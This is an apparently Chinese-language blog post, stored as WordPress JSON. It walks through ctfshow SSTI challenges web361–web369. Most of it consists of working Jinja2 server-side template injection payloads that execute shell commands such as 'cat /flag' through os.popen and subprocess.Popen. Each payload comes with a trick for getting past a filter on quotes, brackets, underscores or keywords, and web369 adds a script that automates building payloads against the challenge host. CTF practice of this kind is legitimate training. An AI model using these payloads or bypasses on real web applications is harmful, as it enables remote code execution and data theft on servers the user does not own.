{"id":109,"date":"2026-05-22T20:36:23","date_gmt":"2026-05-22T12:36:23","guid":{"rendered":"https:\/\/mdhei.xyz\/?p=109"},"modified":"2026-06-09T18:21:44","modified_gmt":"2026-06-09T10:21:44","slug":"ctfshow-ssti","status":"publish","type":"post","link":"https:\/\/mdhei.xyz\/index.php\/2026\/05\/22\/ctfshow-ssti\/","title":{"rendered":"ctfshow ssti"},"content":{"rendered":"\n<h2 id=\"web361\" class=\"wp-block-heading\">web361<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u6839\u636e\u9898\u76ee\u63d0\u793a\u53c2\u6570\u5e94\u8be5\u662fname<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">?name={{().__<strong>class<\/strong>__.__<strong>base__<\/strong>.__<strong>subclasses<\/strong>__()[185].<strong>__init__<\/strong>.__<strong>globals<\/strong>__.__<strong>builtins<\/strong>__[<a href=\"\">&#8216;eval&#8217;]<\/a>(&#8216;<strong>import<\/strong>(&#8220;os&#8221;).popen(&#8220;cat \/flag&#8221;).read()&#8217;)}}<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__class__\u83b7\u53d6\u5f53\u524d\u5bf9\u8c61\u7684\u7c7b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__base__\u83b7\u53d6\u76f4\u63a5\u7236\u7c7b\uff0c\u8fd9\u91cc\u5c31\u662fobject\u7c7b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__subclasses()__\u83b7\u53d6\u5168\u90e8\u5b50\u7c7b\uff0c\u53d6\u3010185\u3011\uff0c\u8fd9\u91cc\u662f<code>&lt;class 'warnings.catch_warnings'&gt;<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__init__\u521d\u59cb\u5316\u5bf9\u8c61\u51fd\u6570<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__<strong>globals<\/strong>__\u51fd\u6570\u5bf9\u8c61\u7684\u4e00\u4e2a\u5c5e\u6027\uff0c\u91cc\u9762\u4fdd\u5b58\u8fd9\u4e2a\u51fd\u6570\u5b9a\u4e49\u65f6\u6240\u5728\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">__<strong>builtins<\/strong>__ \u56e0\u4e3aglobal\u83b7\u53d6\u7684\u662f\u5f53\u524d__init__\u51fd\u6570\u6240\u5728\u6a21\u5757\u7684\u547d\u540d\u7a7a\u95f4\uff0c\u5927\u6982\u7387\u4e0d\u5305\u542beval\u8fd9\u79cdpython\u5185\u7f6e\u51fd\u6570\uff0c\u800cglobals\u5185\u6709\u4e00\u4e2a__<strong>builtins<\/strong>__\u5bf9\u5e94\u7684\u5c31\u662fPython \u7684\u5185\u7f6e\u540d\u5b57\u96c6\u5408\uff0c\u91cc\u9762\u5c31\u5305\u542beval<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u53d6\u51fa[&#8216;eval&#8217;]\u6267\u884c(&#8216;<strong>import<\/strong>(&#8220;os&#8221;).popen(&#8220;cat \/flag&#8221;).read()&#8217;)\u8bfb\u53d6\u5185\u5bb9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc.__builtins__\u8be2\u95eeai\u7684\u65f6\u5019\u544a\u8bc9\u6211\u5e94\u8be5\u662f\u4f5c\u4e3a\u4e00\u4e2a\u952e\u6765\u7528\u7684\u5e94\u8be5\u662f[&#8216;__builtins__&#8217;]\u5c1d\u8bd5\u4e86\u4e24\u79cd\u60c5\u51b5\u90fd\u53ef\u4ee5\u5f97\u51fa\u7ed3\u679c\uff0c\u8fd8\u4e0d\u660e\u767d\u662f\u4e3a\u4ec0\u4e48\u3002<\/p>\n\n\n\n<h2 id=\"web362\" class=\"wp-block-heading\">web362<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u548c\u4e0a\u9898\u4e00\u6837\uff0c\u6216\u8005\u4f7f\u7528subprocess.Popen()<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">?name={{().<strong>class<\/strong>.<strong>mro<\/strong>[1].<strong>subclasses<\/strong>()[407](&#8220;cat \/flag&#8221;,shell=True,stdout=-1).communicate()[0]}}<\/p>\n\n\n\n<h2 id=\"web363\" class=\"wp-block-heading\">web363<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fc7\u6ee4\u4e86\u5355\u53cc\u5f15\u53f7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">?name={{().__<strong>class<\/strong>__.__<strong>mro__<\/strong>[1].__<strong>subclasses__<\/strong>()[<a href=\"request.args.a,shell=True,stdout=-1\">407<\/a>](request.args.a,shell=True,stdout=-1).communicate()[0].decode()}}&amp;a=cat \/flag<\/p>\n\n\n\n<h2 id=\"web364\" class=\"wp-block-heading\">web364<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>name={{().__class__.__base__.__subclasses__()&#91;132].__init__.__globals__&#91;request.args.a](request.args.b).read()}}&amp;a=popen&amp;b=cat \/flag\n\n\n\u548c\u4e0a\u4e00\u9898request.args\u4e0d\u540c\u7684\u662f\uff0c\u8fd9\u91cc\u7684value\u5305\u62ecget\u548cpost\u4e24\u79cd\u53c2\u6570<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u4e0a\u5185\u5bb9\u53ef\u80fd\u4f1a\u6709\u9057\u6f0f\u6216\u9519\u8bef\uff0c\u6b22\u8fce\u7559\u8a00\u6307\u6b63\u3002<\/p>\n\n\n\n<h2 id=\"web365\" class=\"wp-block-heading\">web365<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>?name={{().__class__.__base__.__subclasses__().__getitem__(407)(request.values.a,shell=True,stdout=-1).communicate().__getitem__(0)}}&amp;a=cat \/flag\n\u7528__getitem__\u7ed5\u8fc7\u4e2d\u62ec\u53f7\u8fc7\u6ee4\n\n\n<\/code><\/pre>\n\n\n\n<h2 id=\"web366\" class=\"wp-block-heading\">web366<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>?name={{(lipsum | attr(request.values.b)).os.popen(request.values.a).read()}}&amp;a=cat \/flag&amp;b=__globals__\n\u4e0b\u5212\u7ebf\u8fc7\u6ee4\uff0c\u7528  \u5bf9\u8c61 | \u8fc7\u6ee4\u5668 \u8bed\u6cd5\u7ed5\u8fc7\uff0c \u8fd9\u91cc\u5c31\u662f\u53d6lipsum\u7684__globals__\u5c5e\u6027\n<\/code><\/pre>\n\n\n\n<h2 id=\"web367\" class=\"wp-block-heading\">web367<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>?name={{(lipsum | attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&amp;a=__globals__&amp;b=os&amp;c=cat \/flag\nos\u88ab\u8fc7\u6ee4\uff0c\u7528get()\u7ed5\u8fc7<\/code><\/pre>\n\n\n\n<h2 id=\"web368\" class=\"wp-block-heading\">web368<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>?name={%print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %}&amp;a=__globals__&amp;b=os&amp;c=cat \/flag\n\n\u8fd9\u91cc\u6709\u4e2a\u8bed\u6cd5\u53d8\u5316\n{{ ... }}\uff1a\u8868\u8fbe\u5f0f\u8f93\u51fa\uff08\u81ea\u52a8 print\uff09\n{% ... %}\uff1a\u8bed\u53e5\u6267\u884c\uff08\u9700\u8981\u624b\u52a8 print\uff09 \u7ed5\u8fc7{{request}}\n\n\n<\/code><\/pre>\n\n\n\n<h2 id=\"web369\" class=\"wp-block-heading\">web369<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">{%%}\u4e2d\u8fc7\u6ee4\u4e86request<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5229\u7528config\u6587\u672c\u7684\u5b57\u7b26\u62fc\u63a5payload<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u811a\u672c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\ndef getpayload(payload):\n    result = \"\"\n    for j in payload:\n        for i in range(1000):\n            r = requests.get(url=\"http:\/\/e49b08f8-d479-408d-9984-601ca9cd0e08.challenge.ctf.show\/?name=\"+\"{\"+\"% print(config|string|list).pop({}).lower()%\".format(i)+\"}\")\n            location = r.text.find(\"&lt;h3>\")\n            part = r.text&#91;location+4:location+5]\n            if part.lower() == j:\n                result += \"(config|string|list).pop({0}).lower()\".format(i)\n                print(result)\n                break\n    print(result)\nif __name__ == \"__main__\":\n    getpayload(\"cat \/flag\")\n    print(\"\/\/\/\")\n    getpayload(\"__globals__\")\n    print(\"\/\/\/\")\n    getpayload(\"os\")\n\npayload\u5982\u4e0b\n\nhttps:\/\/e49b08f8-d479-408d-9984-601ca9cd0e08.challenge.ctf.show\/?name={%print(lipsum|attr((config|string|list).pop(74).lower()~(config|string|list).pop(74).lower()~(config|string|list).pop(6).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(2).lower()~(config|string|list).pop(33).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(42).lower()~(config|string|list).pop(74).lower()~(config|string|list).pop(74).lower())).get((config|string|list).pop(2).lower()~(config|string|list).pop(42).lower()).popen((config|string|list).pop(22).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(23).lower()~(config|string|list).pop(7).lower()~(config|string|list).pop(279).lower()~(config|string|list).pop(4).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(6).lower()).read() %}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>web361 \u6839\u636e\u9898\u76ee\u63d0\u793a\u53c2\u6570\u5e94\u8be5\u662fname ?name={{().__class__.__base__.__ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-109","post","type-post","status-publish","format-standard","hentry","category-web"],"_links":{"self":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/109","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/comments?post=109"}],"version-history":[{"count":8,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/109\/revisions"}],"predecessor-version":[{"id":135,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/109\/revisions\/135"}],"wp:attachment":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/media?parent=109"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/categories?post=109"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/tags?post=109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}